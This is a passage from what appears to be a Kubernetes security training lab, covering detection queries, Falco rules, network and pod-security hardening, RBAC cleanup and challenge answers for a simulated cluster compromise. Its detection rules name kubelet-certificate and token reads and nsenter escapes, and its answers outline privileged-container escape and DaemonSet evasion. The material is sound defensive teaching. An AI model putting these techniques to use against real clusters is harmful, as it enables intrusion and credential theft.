| extend actor = tostring(parse_json(log_s).user.username)
| project SACreatedTime = TimeGenerated, actor, saName;
let crb_created = AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| where resource == "clusterrolebindings" and verb == "create"
| extend roleName = tostring(parse_json(tostring(parse_json(log_s).requestObject)).roleRef.name)
| extend boundSA = tostring(parse_json(tostring(parse_json(log_s).requestObject)).subjects[0].name)
| where roleName == "cluster-admin"
| project CRBCreatedTime = TimeGenerated, boundSA, roleName;
sa_created
| join kind=inner (crb_created) on $left.saName == $right.boundSA
| where CRBCreatedTime - SACreatedTime between (0s .. 10m)
| project SACreatedTime, CRBCreatedTime, actor, saName, roleName
SPL — Detect New ServiceAccount with cluster-admin
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.name" output=name
| spath input=log "user.username" output=actor
| spath input=log "requestObject.roleRef.name" output=roleName
| spath input=log "requestObject.subjects{}.name" output=boundSA
| search (resource="serviceaccounts" verb="create")
    OR (resource="clusterrolebindings" verb="create" roleName="cluster-admin")
| eval saKey=coalesce(boundSA, name)
| transaction saKey maxspan=10m
| where eventcount > 1
| table _time actor name resource verb roleName boundSA
Remediation — Phase 4¶
- Restrict workload creation in kube-system — only cluster operators should deploy to system namespaces
- Monitor for new ClusterRoleBindings — alert on any binding that references `cluster-admin`
- Set short token expiration — enforce `--duration` limits and rotate service account tokens regularly
- Audit DaemonSets and CronJobs periodically — compare against a known-good baseline
- Use image allowlisting — only permit images from trusted registries via admission policies
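The image-allowlisting item could be enforced with an admission policy along these lines (a Kyverno sketch; the policy name and pattern are illustrative, and any admission controller with equivalent validation would do):

```yaml
# Kyverno ClusterPolicy restricting images to the trusted registry (SYNTHETIC)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-image-registries
spec:
  validationFailureAction: Enforce
  rules:
  - name: trusted-registry-only
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Images must be pulled from registry.acme.example:5000"
      pattern:
        spec:
          containers:
          - image: "registry.acme.example:5000/*"
```

With this in place, the Phase 4 DaemonSet and CronJob would be rejected at admission unless the attacker can also push to the trusted registry.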
Phase 5: Defense — Hardening the Cluster¶
Objective¶
Deploy defensive controls that prevent or detect each attack phase demonstrated above.
Step 5.1: Enforce Pod Security Standards¶
# Apply Pod Security Standards at the namespace level (SYNTHETIC)
# Enforce "restricted" profile — blocks privileged pods, hostPath, hostPID
apiVersion: v1
kind: Namespace
metadata:
  name: frontend
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted
# Apply to all application namespaces (SYNTHETIC)
$ for ns in frontend backend database monitoring cicd backup; do
    kubectl label namespace $ns \
      pod-security.kubernetes.io/enforce=restricted \
      pod-security.kubernetes.io/audit=restricted \
      pod-security.kubernetes.io/warn=restricted \
      --overwrite
  done
namespace/frontend labeled
namespace/backend labeled
namespace/database labeled
namespace/monitoring labeled
namespace/cicd labeled
namespace/backup labeled
# Test: try to create a privileged pod (should be rejected) (SYNTHETIC)
$ kubectl apply -f webapp-vuln.yaml -n frontend
Error from server (Forbidden): error when creating "webapp-vuln.yaml":
pods "webapp-vuln" is forbidden: violates PodSecurity "restricted:latest":
privileged (container "webapp" must not set securityContext.privileged=true),
hostPath volumes (volume "host-root" must not use hostPath)
Step 5.2: Deploy Network Policies¶
# Default deny all ingress and egress in each namespace (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: frontend
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
---
# Allow only frontend → backend traffic on port 8080 (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: backend
spec:
  podSelector:
    matchLabels:
      app: api-server
  policyTypes:
    - Ingress
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: frontend
          podSelector:
            matchLabels:
              app: webapp
      ports:
        - protocol: TCP
          port: 8080
---
# Block all egress to external IPs (prevent C2 callbacks) (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-external-egress
  namespace: kube-system
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 10.50.0.0/16
      ports:
        - protocol: TCP
          port: 6443
        - protocol: TCP
          port: 53
        - protocol: UDP
          port: 53
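Note that a default-deny egress policy also blocks DNS lookups from the namespace, which would break name-based service access. Cluster DNS must be allowed explicitly, along the lines of this sketch (the k8s-app=kube-dns label is the conventional CoreDNS selector; verify the label in your cluster):

```yaml
# Allow DNS egress to cluster DNS from the frontend namespace (SYNTHETIC)
# Assumes CoreDNS carries the conventional k8s-app=kube-dns label
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: frontend
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
```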
Step 5.3: Deploy Falco Runtime Detection¶
# Falco rules for Kubernetes attack detection (SYNTHETIC)
# Save as /etc/falco/rules.d/k8s-attack-defense.yaml
- rule: Privileged Container Started
  desc: Detect when a privileged container is started
  condition: >
    container_started and container and container.privileged=true
  output: >
    Privileged container started (user=%user.name container=%container.id
    image=%container.image.repository pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: CRITICAL
  tags: [container, cis, mitre_privilege_escalation, T1611]

- rule: Read Sensitive File in Container
  desc: Detect read of sensitive files (kubelet certs, service account tokens)
  condition: >
    open_read and container and
    (fd.name startswith /var/lib/kubelet/pki or
     fd.name startswith /var/run/secrets/kubernetes.io or
     fd.name startswith /etc/kubernetes/pki)
  output: >
    Sensitive file read in container (user=%user.name file=%fd.name
    container=%container.id pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: WARNING
  tags: [container, filesystem, mitre_credential_access, T1552.001]

- rule: Outbound Connection to Non-RFC1918
  desc: Detect pod making outbound connections to public IPs (potential C2)
  # Match the destination network against the full RFC 1918 CIDR ranges
  condition: >
    outbound and container and
    not (fd.snet in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"))
  output: >
    Outbound connection to public IP from container (command=%proc.cmdline
    dest=%fd.sip:%fd.sport container=%container.id pod=%k8s.pod.name
    ns=%k8s.ns.name image=%container.image.repository)
  priority: WARNING
  tags: [container, network, mitre_command_and_control, T1071]
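One subtlety in RFC 1918 matching: naive string-prefix checks on IP addresses (for example, matching anything starting with "172.16.") cover only one /16 of the 172.16.0.0/12 range. When post-processing alerts outside Falco, a proper CIDR membership test is safer. A minimal Python sketch using only the standard library:

```python
import ipaddress

# RFC 1918 private ranges; a startswith("172.16.") check would miss
# everything from 172.17.0.0 through 172.31.255.255
RFC1918 = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

def is_private(ip: str) -> bool:
    """Return True if ip falls inside any RFC 1918 range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

# 172.31.x.x is private, but a prefix check on "172.16." would miss it
print(is_private("172.31.4.9"))    # True
print(is_private("172.32.0.1"))    # False
print(is_private("10.50.128.7"))   # True (lab pod network, SYNTHETIC)
```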
Step 5.4: Fix RBAC Misconfigurations¶
# Remove overly permissive ClusterRoleBinding (SYNTHETIC)
$ kubectl delete clusterrolebinding monitor-cluster-wide
clusterrolebinding.rbac.authorization.k8s.io "monitor-cluster-wide" deleted
# Create a scoped Role for monitoring (SYNTHETIC)
$ cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-read-only
rules:
  - apiGroups: [""]
    resources: ["pods", "nodes", "services", "endpoints"]
    verbs: ["get", "list", "watch"]
  - apiGroups: ["apps"]
    resources: ["deployments", "replicasets", "daemonsets"]
    verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: monitoring-read-only-binding
subjects:
  - kind: ServiceAccount
    name: monitor-sa
    namespace: monitoring
roleRef:
  kind: ClusterRole
  name: monitoring-read-only
  apiGroup: rbac.authorization.k8s.io
EOF
clusterrole.rbac.authorization.k8s.io/monitoring-read-only created
clusterrolebinding.rbac.authorization.k8s.io/monitoring-read-only-binding created
# Remove the backdoor (SYNTHETIC)
$ kubectl delete clusterrolebinding emergency-access-binding
$ kubectl delete serviceaccount backdoor-sa -n kube-system
$ kubectl delete daemonset node-monitor-agent -n kube-system
$ kubectl delete cronjob log-rotation-job -n kube-system
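To keep this class of misconfiguration from recurring, it helps to periodically sweep the cluster for bindings that grant cluster-admin. A hypothetical helper sketch in Python that scans the parsed output of kubectl get clusterrolebindings -o json (the function name and field handling are illustrative, not part of the lab tooling):

```python
# Hypothetical sweep: flag every ClusterRoleBinding that grants cluster-admin.
# Feed it the parsed JSON from: kubectl get clusterrolebindings -o json
def find_cluster_admin_bindings(bindings_doc: dict) -> list[dict]:
    findings = []
    for item in bindings_doc.get("items", []):
        if item.get("roleRef", {}).get("name") != "cluster-admin":
            continue
        for subj in item.get("subjects", []) or []:
            findings.append({
                "binding": item["metadata"]["name"],
                "kind": subj.get("kind"),
                "subject": subj.get("name"),
                "namespace": subj.get("namespace", ""),
            })
    return findings

# Synthetic document shaped like the API response (SYNTHETIC)
doc = {"items": [{
    "metadata": {"name": "emergency-access-binding"},
    "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
    "subjects": [{"kind": "ServiceAccount", "name": "backdoor-sa",
                  "namespace": "kube-system"}],
}]}
for finding in find_cluster_admin_bindings(doc):
    print(finding)
```

Each finding can then be diffed against a known-good allowlist of expected cluster-admin subjects, with anything new raised as an alert.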
Phase 6: Detection Engineering — Comprehensive Query Library¶
Objective¶
Build a complete detection library covering every attack phase with both KQL and SPL queries.
Detection Matrix¶
| Phase | Attack Technique | MITRE ATT&CK | KQL | SPL |
|---|---|---|---|---|
| Recon | API enumeration from pod | T1613 | ||
| Recon | RBAC discovery | T1069 | ||
| PrivEsc | nsenter container escape | T1611 | ||
| PrivEsc | Kubelet credential harvest | T1552.001 | ||
| Lateral | ClusterRoleBinding abuse | T1078.004 | ||
| Lateral | Cross-namespace secret access | T1552.007 | ||
| Persist | Malicious DaemonSet | T1053.007 | ||
| Persist | CronJob backdoor | T1053.003 | ||
| Persist | Backdoor service account | T1136.001 | ||
| C2 | Outbound beaconing from pod | T1071.001 | | |
Step 6.1: Unified KQL Detection Rule Pack¶
// === KUBERNETES ATTACK DETECTION — UNIFIED KQL RULE PACK === (SYNTHETIC)
// Rule 1: Container Escape Indicators
// Detects nsenter, chroot, or mount namespace manipulation
DeviceProcessEvents
| where FileName in ("nsenter", "chroot", "unshare")
| where ProcessCommandLine has_any ("--target", "--mount", "--pid", "--net")
| extend AlertName = "Kubernetes Container Escape Attempt"
| extend MitreTechnique = "T1611"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine,
AlertName, MitreTechnique
// Rule 2: Suspicious kubectl Exec Into Pod
// Detects interactive shells spawned inside pods
AzureDiagnostics
| where Category == "kube-audit"
| extend audit = parse_json(log_s)
| extend verb = tostring(audit.verb)
| extend subresource = tostring(audit.objectRef.subresource)
| extend user = tostring(audit.user.username)
| extend podName = tostring(audit.objectRef.name)
| extend namespace = tostring(audit.objectRef.namespace)
| where subresource == "exec" and verb == "create"
| project TimeGenerated, user, podName, namespace
// Rule 3: Token Generation for Service Account
// Detects long-lived token creation (persistence indicator)
AzureDiagnostics
| where Category == "kube-audit"
| extend audit = parse_json(log_s)
| extend verb = tostring(audit.verb)
| extend resource = tostring(audit.objectRef.resource)
| extend subresource = tostring(audit.objectRef.subresource)
| extend user = tostring(audit.user.username)
| where resource == "serviceaccounts" and subresource == "token" and verb == "create"
| project TimeGenerated, user, resource, subresource
Step 6.2: Unified SPL Detection Rule Pack¶
// === KUBERNETES ATTACK DETECTION — UNIFIED SPL RULE PACK === (SYNTHETIC)
// Rule 1: Container Escape Indicators
index=linux (sourcetype=syslog OR sourcetype=falco)
| search process_name IN ("nsenter", "chroot", "unshare")
| search cmdline="*--target*" OR cmdline="*--mount*" OR cmdline="*--pid*"
| eval alert_name="Kubernetes Container Escape Attempt"
| eval mitre_technique="T1611"
| table _time host user process_name cmdline alert_name mitre_technique
// Rule 2: Suspicious kubectl Exec Into Pod
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.subresource" output=subresource
| spath input=log "user.username" output=user
| spath input=log "objectRef.name" output=podName
| spath input=log "objectRef.namespace" output=namespace
| search subresource="exec" verb="create"
| table _time user podName namespace
// Rule 3: Token Generation for Service Account
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.subresource" output=subresource
| spath input=log "user.username" output=user
| search resource="serviceaccounts" subresource="token" verb="create"
| table _time user resource subresource
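When no SIEM is available, the same logic as Rules 2 and 3 can be applied directly to raw API server audit log lines. A triage sketch in Python (field names follow the Kubernetes audit Event schema; this is an ad-hoc illustration, not a replacement for the SIEM rules):

```python
import json

def flag_audit_event(raw):
    """Return an alert name if an audit event matches Rule 2 or Rule 3, else None."""
    ev = json.loads(raw)
    ref = ev.get("objectRef", {}) or {}
    if ev.get("verb") != "create":
        return None
    if ref.get("subresource") == "exec":
        return "Suspicious kubectl exec into pod"
    if ref.get("resource") == "serviceaccounts" and ref.get("subresource") == "token":
        return "Service account token generation"
    return None

# Synthetic audit events (SYNTHETIC)
events = [
    '{"verb": "create", "user": {"username": "dev@acme.example"}, '
    '"objectRef": {"resource": "pods", "subresource": "exec", '
    '"name": "webapp-vuln", "namespace": "frontend"}}',
    '{"verb": "get", "objectRef": {"resource": "secrets"}}',
]
for raw in events:
    alert = flag_audit_event(raw)
    if alert:
        print(alert)   # only the first event matches
```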
Challenge Questions¶
Challenge 1: Why is privileged: true Dangerous?
Explain why a privileged container is functionally equivalent to root on the host. What Linux kernel capabilities does it inherit, and how does this enable container escape?
Answer
A privileged container runs with all Linux capabilities (CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_SYS_PTRACE, etc.), disables seccomp and AppArmor profiles, and can access all host devices. With CAP_SYS_ADMIN, the container can use nsenter to enter the host's PID and mount namespaces, effectively becoming root on the node. Combined with a hostPath volume mounting /, the container has full read/write access to the host filesystem — including kubelet credentials, other container runtimes, and SSH keys.
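From inside a suspect container, one quick triage check is to decode the CapEff bitmask reported by grep CapEff /proc/self/status. A small Python sketch (the sample masks are illustrative; CAP_SYS_ADMIN is capability number 21):

```python
# Decode a CapEff bitmask (as shown in /proc/self/status) and test for
# CAP_SYS_ADMIN (capability number 21), the key escape-enabling capability.
CAP_SYS_ADMIN = 21

def has_cap_sys_admin(capeff_hex: str) -> bool:
    return bool((int(capeff_hex, 16) >> CAP_SYS_ADMIN) & 1)

# Sample masks (illustrative): default Docker cap set vs. an all-caps mask
print(has_cap_sys_admin("00000000a80425fb"))  # False (default cap set)
print(has_cap_sys_admin("0000003fffffffff"))  # True (privileged container)
```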
Challenge 2: How Would You Detect This Attack Without Falco?
If your organization does not use Falco, what alternative detection methods could you deploy to catch container escape and lateral movement?
Answer
Alternatives include: (1) Kubernetes audit logging at RequestResponse level to capture all API calls including secret reads, exec into pods, and RBAC changes; (2) eBPF-based tools like Tetragon or Tracee that hook into kernel syscalls to detect namespace manipulation; (3) Syslog monitoring on nodes for nsenter/chroot processes; (4) Cloud-native tools like Defender for Containers (Azure), GuardDuty for EKS (AWS), or Security Command Center (GCP); (5) Network flow monitoring to detect unexpected cross-namespace or external traffic.
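For alternative (1), a minimal audit policy sketch that captures the riskiest objects at RequestResponse level (passed to the API server via --audit-policy-file; the rule set is illustrative and should be tuned to your cluster):

```yaml
# Minimal kube-apiserver audit policy sketch (SYNTHETIC)
# Full request/response for secrets, service accounts, RBAC, and exec/attach;
# everything else at Metadata level to limit volume
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["secrets", "serviceaccounts"]
      - group: "rbac.authorization.k8s.io"
        resources: ["clusterroles", "clusterrolebindings", "roles", "rolebindings"]
  - level: RequestResponse
    verbs: ["create"]
    resources:
      - group: ""
        resources: ["pods/exec", "pods/attach"]
  - level: Metadata
```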
Challenge 3: RBAC Least Privilege Design
The monitor-sa service account was bound to cluster-admin. Design an RBAC policy that gives monitoring the minimum permissions needed (read pods, nodes, metrics) without granting access to secrets or workload mutation.
Answer
Create a custom ClusterRole with only get, list, watch on pods, nodes, services, endpoints, and pods/log. For metrics, grant access to the metrics.k8s.io API group. Explicitly exclude secrets, configmaps with sensitive data, and all write verbs (create, update, patch, delete). Bind using a ClusterRoleBinding (since monitoring needs cross-namespace read). Disable automountServiceAccountToken on all pods in the monitoring namespace that do not actually need API access.
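That design translates into a manifest along these lines (a sketch; the role name is illustrative):

```yaml
# Least-privilege monitoring ClusterRole sketch (SYNTHETIC)
# Read-only on workloads plus metrics.k8s.io; no secrets, no write verbs
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-minimal
rules:
  - apiGroups: [""]
    resources: ["pods", "nodes", "services", "endpoints", "pods/log"]
    verbs: ["get", "list", "watch"]
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list"]
```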
Challenge 4: DaemonSet Detection Evasion
The malicious DaemonSet was named node-monitor-agent to blend in. What additional techniques could an attacker use to make the DaemonSet harder to detect, and how would you counter each one?
Answer
Evasion techniques include: (1) Using the same labels as legitimate system components (counter: maintain a CMDB/baseline of expected workloads and diff against it); (2) Deploying to a newly created namespace with a system-sounding name (counter: alert on namespace creation); (3) Using an image tag that matches existing images but from a different registry (counter: image allowlisting via admission controller); (4) Setting the DaemonSet owner reference to appear managed by a legitimate controller (counter: audit trail shows creation actor); (5) Using init containers for one-time execution then self-deleting (counter: audit log captures creation events regardless of pod lifecycle).
Challenge 5: Incident Response — Full Cluster Compromise
You have confirmed an attacker completed all phases of this lab in your production cluster. Write a 5-step incident response plan to contain, eradicate, and recover from this compromise.
Answer
1. Contain: Immediately rotate the compromised service account tokens, delete unauthorized ClusterRoleBindings (emergency-access-binding, monitor-cluster-wide), and apply NetworkPolicies to block all egress to external IPs from kube-system.
2. Identify: Query audit logs for all actions by the compromised identities (webapp-sa, monitor-sa, backdoor-sa) — build a full timeline of accessed resources.
3. Eradicate: Delete the malicious DaemonSet, CronJob, and backdoor service account. Scan all nodes for persistent rootkits or SSH keys dropped via the host mount. Rebuild affected nodes from clean images.
4. Recover: Rotate ALL secrets cluster-wide (database passwords, TLS certs, API keys). Re-deploy workloads from trusted CI/CD pipeline. Enable Pod Security Standards on all namespaces.
5. Lessons Learned: Implement admission controllers to block privileged pods, enforce RBAC review process, deploy Falco or equivalent runtime detection, enable audit logging at RequestResponse level.
ATT&CK Technique Mapping¶
| ATT&CK ID | Technique | Phase | Detection Method |
|---|---|---|---|
| T1613 | Container and Resource Discovery | Phase 1 | API audit log enumeration patterns |
| T1069 | Permission Groups Discovery | Phase 1 | RBAC query monitoring |
| T1611 | Escape to Host | Phase 2 | nsenter/chroot process detection |
| T1552.001 | Credentials in Files | Phase 2 | Kubelet cert file access monitoring |
| T1078.004 | Valid Accounts: Cloud Accounts | Phase 3 | ClusterRoleBinding abuse detection |
| T1552.007 | Container API | Phase 3 | Cross-namespace secret access patterns |
| T1053.007 | Container Orchestration Job | Phase 4 | DaemonSet creation in kube-system |
| T1053.003 | Cron | Phase 4 | CronJob creation monitoring |
| T1136.001 | Create Account: Local Account | Phase 4 | ServiceAccount creation + privilege binding |
| T1071.001 | Application Layer Protocol | Phase 4 | Outbound HTTP from system pods |
Security Controls Implemented¶
| Category | Before | After |
|---|---|---|
| Pod Security | No restrictions (privileged allowed) | Pod Security Standards restricted on all app namespaces |
| RBAC | cluster-admin bound to monitor-sa | Least-privilege read-only ClusterRole for monitoring |
| Network Policies | None (all pods communicate freely) | Default deny + explicit allow rules per namespace |
| Runtime Detection | None | Falco with custom rules for escape, C2, and privilege escalation |
| Secrets Management | Plaintext in etcd, native K8s secrets | etcd encryption at rest + external secret manager |
| Container Images | Any registry allowed | Image allowlisting via admission controller |
| Audit Logging | Minimal (metadata only) | RequestResponse level for secrets, RBAC, workloads |
| Service Account Tokens | Long-lived, auto-mounted | Short-lived, automount disabled where not needed |
Additional Resources¶
Cross-References¶
- Chapter 46: Cloud & Container Red Teaming — container attack methodology and cloud-native offensive security
- Chapter 20: Cloud Attack & Defense — cloud security fundamentals, shared responsibility, and defense patterns
- Lab 21: Cloud Container Security — foundational container security hardening lab
- Lab 26: Container & K8s Red Team — complementary container red team exercises
- Scenario SC-085: Kubernetes RBAC Abuse — incident response scenario for RBAC exploitation
- ATT&CK Technique Reference — detection queries mapped to ATT&CK techniques
- Chapter 5: Detection Engineering at Scale — building detection pipelines, KQL/SPL query optimization
External Resources¶
- MITRE ATT&CK — Containers Matrix — ATT&CK techniques specific to container environments
- Kubernetes Pod Security Standards — official K8s pod security documentation
- Falco — Cloud Native Runtime Security — Falco rules and deployment guide
- CIS Kubernetes Benchmark — CIS hardening guidance for Kubernetes
- OWASP Kubernetes Security Cheat Sheet — OWASP K8s security reference
- Kubernetes RBAC Good Practices — official RBAC hardening guidance
CWE References¶
| CWE | Name | Phase |
|---|---|---|
| CWE-250 | Execution with Unnecessary Privileges | Phase 2 (privileged pod) |
| CWE-269 | Improper Privilege Management | Phase 3 (cluster-admin to monitor-sa) |
| CWE-284 | Improper Access Control | Phase 3 (cross-namespace secret access) |
| CWE-522 | Insufficiently Protected Credentials | Phase 3 (secrets in plaintext etcd) |
| CWE-732 | Incorrect Permission Assignment for Critical Resource | Phase 1 (overly broad RBAC) |
| CWE-912 | Hidden Functionality | Phase 4 (disguised DaemonSet and CronJob) |
Advance Your Career¶
Recommended Certifications
This lab covers objectives tested in the following certifications. Investing in these credentials validates your Kubernetes and container security expertise:
| Certification | Focus | Link |
|---|---|---|
| CKS — Certified Kubernetes Security Specialist | Cluster hardening, supply chain security, runtime detection, network policies, Pod Security Standards | Learn More |
| CKA — Certified Kubernetes Administrator | Cluster architecture, workload management, networking, storage, RBAC, troubleshooting | Learn More |
| CompTIA Security+ (SY0-701) | Cloud and container security concepts, security operations, incident response | Learn More |
| CompTIA CySA+ (CS0-003) | Security operations, detection engineering, vulnerability management, incident response | Learn More |
| SC-200 — Microsoft Security Operations Analyst | KQL detection queries, Defender for Containers, Sentinel analytics for cloud workloads | Learn More |